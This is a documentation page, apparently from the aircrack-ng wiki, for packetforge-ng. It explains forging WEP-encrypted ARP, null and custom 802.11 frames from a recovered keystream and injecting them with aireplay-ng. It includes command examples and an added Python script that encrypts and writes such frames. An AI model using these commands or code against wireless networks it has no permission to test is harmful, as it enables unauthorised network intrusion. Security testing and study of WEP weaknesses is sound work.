packetforge-ng

Revisions compared on this page:
  * 2007/01/25 01:24: darkaudax created the page
  * 2010/08/22 20:59 (current): mister_x updated "Usage" and fixed the "mode" rendering

The text below is the current revision.
===== Description =====
packetforge-ng creates encrypted packets that can subsequently be used for injection. You may create various types of packets such as ARP requests, UDP, ICMP and custom packets. The most common use is to create ARP requests for subsequent injection.
  
To create an encrypted packet you need a PRGA (pseudo-random generation algorithm) file, i.e. a recovered WEP keystream. The packet you build is XORed with this keystream, so it can be encrypted correctly without knowing the WEP key. The PRGA file is typically obtained with the [[aireplay-ng]] [[korek_chopchop|chopchop]] or [[fragmentation]] attacks; it must contain at least as many keystream bytes as the packet body (plus ICV) you want to encrypt.
  
===== Usage =====

  Usage: packetforge-ng <mode> <options>
  
==== Forge options ====
  
      *-p <fctrl>     : set frame control word (hex)
      [unchanged lines not shown]
      *-e             : disables WEP encryption
      *-k <ip[:port]> : set Destination IP [Port]
      *-l <ip[:port]> : set Source      IP [Port] (dash lowercase letter L)
      *-t ttl         : set Time To Live
      *-w <file>      : write packet to this pcap file
  
==== Source options ====
  
      *-r <file>      : read packet from this raw file
      *-y <file>      : read PRGA from this file
  
==== Modes ====

      *--arp          : forge an ARP packet    (-0)
      *--udp          : forge an UDP packet    (-1)
      *--icmp         : forge an ICMP packet   (-2)
      *--null         : build a null packet    (-3)
      *--custom       : build a custom packet  (-9)
  
===== Usage Example =====
  
==== Generating an ARP request packet ====
Here is an example of how to generate an ARP request packet.
  
First, obtain an xor file (the PRGA) with either the aireplay-ng chopchop or fragmentation method.
  
Then use the following command:
  
  packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D -k 192.168.1.100 -l 192.168.1.1 -y fragment-0124-161129.xor -w arp-request
  
Where:
  * -0 means generate an ARP packet
  * -a 00:14:6C:7E:40:80 is the Access Point MAC address
  * -h 00:0F:B5:AB:CB:9D is the source MAC address you wish to use
  * -k 192.168.1.100 is the destination IP, i.e. in an ARP request the "Who has this IP" address
  * -l 192.168.1.1 is the source IP, i.e. the "Tell this IP" address (dash lowercase L, not the digit one)
  * -y fragment-0124-161129.xor is the file containing the PRGA
  * -w arp-request is the name of the output file
[unchanged lines not shown]

The results of decrypting the written file look like this:
  Total number of packets read             1
  Total number of WEP data packets         1
  Total number of WPA data packets         0
  Number of plaintext data packets         0
  Number of decrypted WEP  packets         1
  Number of decrypted WPA  packets         0
  
To view the packet that was just decrypted, enter "tcpdump -n -vvv -e -s0 -r arp-request-dec"

The results look like this:
  reading from file arp-request-dec, link-type EN10MB (Ethernet)
  18:09:27.743303 00:0f:b5:ab:cb:9d > Broadcast, ethertype ARP (0x0806), length 42: arp who-has 192.168.1.100 tell 192.168.1.1
  
Which is exactly what we expected. Now you can inject this ARP request packet with interactive replay: "aireplay-ng -2 -r arp-request ath0" (replace ath0 with your injection-capable interface).
  
The program will respond as follows:

        Size: 68, FromDS: 0, ToDS: 1 (WEP)

             BSSID  =  00:14:6C:7E:40:80
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:0F:B5:AB:CB:9D

        0x0000:  0841 0201 0014 6c7e 4080 000f b5ab cb9d  .A....l~@.......
        0x0010:  ffff ffff ffff 8001 6c48 0000 0999 881a  ........lH......
        [unchanged lines not shown]
        0x0030:  3ab2 cff5 d4d1 6743 8056 24ec 9192 c1e1  :.....gC.V$.....
        0x0040:  d64f b709                                .O..

        Use this packet ? y

        Saving chosen packet in replay_src-0124-163529.cap
        You should also start airodump-ng to capture replies.
        End of file.
  
By entering "y" above, the packet you created with packetforge-ng is injected.


==== Generating a null packet ====

This option allows you to generate LLC null packets. These are the smallest possible packets and contain no data. The switch "-s" is used to manually set the size of the packet. This is a simple way to generate small packets for injection.

Remember that the size value (-s) defines the absolute size of the unencrypted packet, so you need to add 8 bytes to get its final length after encryption (4 bytes for IV + key index and 4 bytes for the ICV). The value also includes the 802.11 header, which is 24 bytes long, so "-s 42" leaves 18 bytes for the frame body and produces a 50-byte encrypted frame.
 + 
The command is:

   packetforge-ng --null -s 42 -a BSSID -h SMAC -w short-packet.cap -y fragment.xor

Where:
  * --null means generate an LLC null packet (requires the double dash; -3 is the short form).
  * -s 42 specifies the unencrypted packet length to be generated, including the 802.11 header.
  * -a BSSID is the MAC address of the access point.
  * -h SMAC is the source MAC address of the packet to be generated.
  * -w short-packet.cap is the name of the output file.
  * -y fragment.xor is the name of the file containing the PRGA.
 + 
 + 
==== Generating a custom packet ====
If you want to generate a custom packet, first create the packet with the tool of your choice. This could be a specialized tool, a hex editor or even a frame taken from a previous capture. Then save it as a pcap file and run:

   packetforge-ng -9 -r input.cap -y keystream.xor -w output.cap

Where:
  * -9 means generate a custom packet (long form: --custom).
  * -r input.cap is the input file.
  * -y keystream.xor is the file containing the PRGA.
  * -w output.cap is the output file.

When it runs, packetforge-ng will ask you which packet in the input file to use and then write the output file.
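The three procedures above (ARP request, null packet, custom packet) all come down to the same operation: build a plaintext 802.11 data frame, append the ICV, XOR the body with the keystream from the .xor file, and prepend the IV and key index. The Python script below is an added example that does exactly this, so you can see what packetforge-ng writes with -w and check the size arithmetic from the null-packet section; it is not aircrack-ng code. Its assumptions: the .xor file layout (3-byte IV, one key-index byte, then keystream), a zero-filled body for the null packet, a broadcast destination address, and a constructed keystream (SAMPLE_PRGA) whose IV is copied from the aireplay-ng dump above; the duration and sequence-control defaults are also taken from that dump so the header bytes can be compared with it.

```python
"""Added example (not aircrack-ng code): forge WEP frames the way
packetforge-ng does and write them to an 802.11 pcap.
Assumed .xor layout: 3-byte IV, 1-byte key index, then keystream."""
import ipaddress
import struct
import zlib

DOT11_HDR_LEN = 24            # 3-address data frame header
WEP_OVERHEAD = 8              # 4 bytes IV+index in front, 4 bytes ICV at the end
LINKTYPE_IEEE802_11 = 105     # pcap link type for raw 802.11 frames
BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed sample PRGA: IV 6c:48:00 and key index 0 (as in the dump on this
# page) followed by 64 bytes of made-up keystream. A real one comes from aireplay-ng.
SAMPLE_PRGA = bytes.fromhex("6c480000") + bytes((37 * i + 11) & 0xFF for i in range(64))


def mac(text):
    return bytes.fromhex(text.replace(":", ""))


def dot11_data_header(bssid, src, dst, duration=0x0102, seq_ctrl=0x0180):
    """Data frame with ToDS=1 and the Protected (WEP) bit set:
    addr1=BSSID, addr2=source, addr3=destination. Duration and sequence
    defaults reproduce the header bytes of the dump on this page."""
    frame_control = bytes([0x08, 0x01 | 0x40])      # type data, ToDS, WEP
    return (frame_control + struct.pack("<H", duration)
            + mac(bssid) + mac(src) + mac(dst) + struct.pack("<H", seq_ctrl))


def arp_request_payload(src_mac, src_ip, target_ip):
    """LLC/SNAP header plus an ARP 'who-has target_ip tell src_ip' (36 bytes)."""
    llc_snap = bytes.fromhex("aaaa030000000806")
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1)    # Ethernet/IPv4, request
    arp += mac(src_mac) + ipaddress.IPv4Address(src_ip).packed
    arp += bytes(6) + ipaddress.IPv4Address(target_ip).packed
    return llc_snap + arp


def null_payload(size):
    """Body for '--null -s size': size counts the 24-byte header; the body
    contents are assumed to be zeros here, only the length matters."""
    if size < DOT11_HDR_LEN:
        raise ValueError("size must include the %d-byte 802.11 header" % DOT11_HDR_LEN)
    return bytes(size - DOT11_HDR_LEN)


def encrypted_length(unencrypted_size):
    """What -s turns into on the air: 4 bytes IV+index and 4 bytes ICV are added."""
    return unencrypted_size + WEP_OVERHEAD


def wep_encrypt(header, plaintext, prga):
    """Append the ICV (CRC-32, little-endian), XOR with the keystream and
    prepend the IV and key index taken from the PRGA file."""
    iv_idx, keystream = prga[:4], prga[4:]
    body = plaintext + struct.pack("<I", zlib.crc32(plaintext))
    if len(keystream) < len(body):
        raise ValueError("PRGA too short: need %d keystream bytes, have %d"
                         % (len(body), len(keystream)))
    cipher = bytes(p ^ k for p, k in zip(body, keystream))
    return header + iv_idx + cipher


def wep_decrypt(frame, prga):
    """Reverse of wep_encrypt (what you see after decrypting the written
    file): strip the IV, XOR with the keystream and verify the ICV."""
    header, iv_idx, cipher = frame[:DOT11_HDR_LEN], frame[24:28], frame[28:]
    if iv_idx != prga[:4]:
        raise ValueError("frame IV/key index does not match the PRGA file")
    body = bytes(c ^ k for c, k in zip(cipher, prga[4:]))
    plaintext, icv = body[:-4], struct.unpack("<I", body[-4:])[0]
    if zlib.crc32(plaintext) != icv:
        raise ValueError("bad ICV: wrong keystream or corrupted frame")
    return header, plaintext


def pcap_bytes(frames):
    """Minimal pcap (link type 105) holding the frames, like '-w file' does."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11)
    for ts, frame in enumerate(frames):
        out += struct.pack("<IIII", ts, 0, len(frame), len(frame)) + frame
    return out


def forge_arp_request(bssid, src_mac, target_ip, src_ip, prga=SAMPLE_PRGA):
    """packetforge-ng -0 -a bssid -h src_mac -k target_ip -l src_ip -y prga"""
    header = dot11_data_header(bssid, src_mac, BROADCAST)
    return wep_encrypt(header, arp_request_payload(src_mac, src_ip, target_ip), prga)


def forge_null(bssid, src_mac, size, prga=SAMPLE_PRGA):
    """packetforge-ng --null -s size -a bssid -h src_mac -y prga"""
    header = dot11_data_header(bssid, src_mac, BROADCAST)
    return wep_encrypt(header, null_payload(size), prga)


if __name__ == "__main__":
    frame = forge_arp_request("00:14:6C:7E:40:80", "00:0F:B5:AB:CB:9D",
                              "192.168.1.100", "192.168.1.1")
    print("ARP request frame: %d bytes" % len(frame))       # 68, as aireplay-ng reported
    with open("arp-request", "wb") as f:
        f.write(pcap_bytes([frame]))
```

The ARP frame comes out at 68 bytes (24 header + 4 IV/index + 36 body + 4 ICV), matching the "Size: 68" line in the aireplay-ng output, and its first 28 bytes are identical to the dump above; the null packet with -s 42 comes out at 50 bytes. Two failure modes worth noticing: a PRGA shorter than body+ICV is refused rather than silently producing a truncated frame, and wep_decrypt rejects a frame whose ICV does not verify, which is what happens when the keystream belongs to a different IV than the one written into the frame.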
 + 
 + 
 + 
===== Usage Tips =====

Most access points don't care what IP addresses are used in the ARP request, because the access point relays the frame without looking at the ARP payload. As a result you can use 255.255.255.255 for both the source and destination IPs.

So the packetforge-ng command becomes:
   packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D -k 255.255.255.255 -l 255.255.255.255 -y fragment-0124-161129.xor -w arp-request
 + 
 + 
===== Usage Troubleshooting =====

==== Including both -j and -o flags ====

A common mistake is to include one or both of the -j and -o flags and so create invalid packets. These flags change the FromDS and ToDS bits in the generated frame. The default (ToDS set, FromDS clear) is what a frame sent from a station to the access point needs, and it is what the aireplay-ng output above shows ("FromDS: 0, ToDS: 1"). Unless you are doing something special and really know what you are doing, don't use them; in general they are not needed.


==== Error message "Mode already specified" ====

This is commonly caused by using the number one (-1) instead of dash lowercase L (-l) in the command. -1 is the short form of --udp, so packetforge-ng sees a second mode after -0 and refuses to continue.

Entering:
   packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 -k 255.255.255.255 -1 255.255.255.255 -y 00:14:6C:7E:40:80-03-00-14-6C-7E-40-80.xor -w arp-request

Gives:
   Mode already specified.
   "packetforge-ng --help" for help.

This is because -1 (the number one) was used instead of the correct -l (the letter ell). So simply use "-l".
  
packetforge-ng.1169684670.txt.gz · Last modified: 2007/01/25 01:24 (external edit)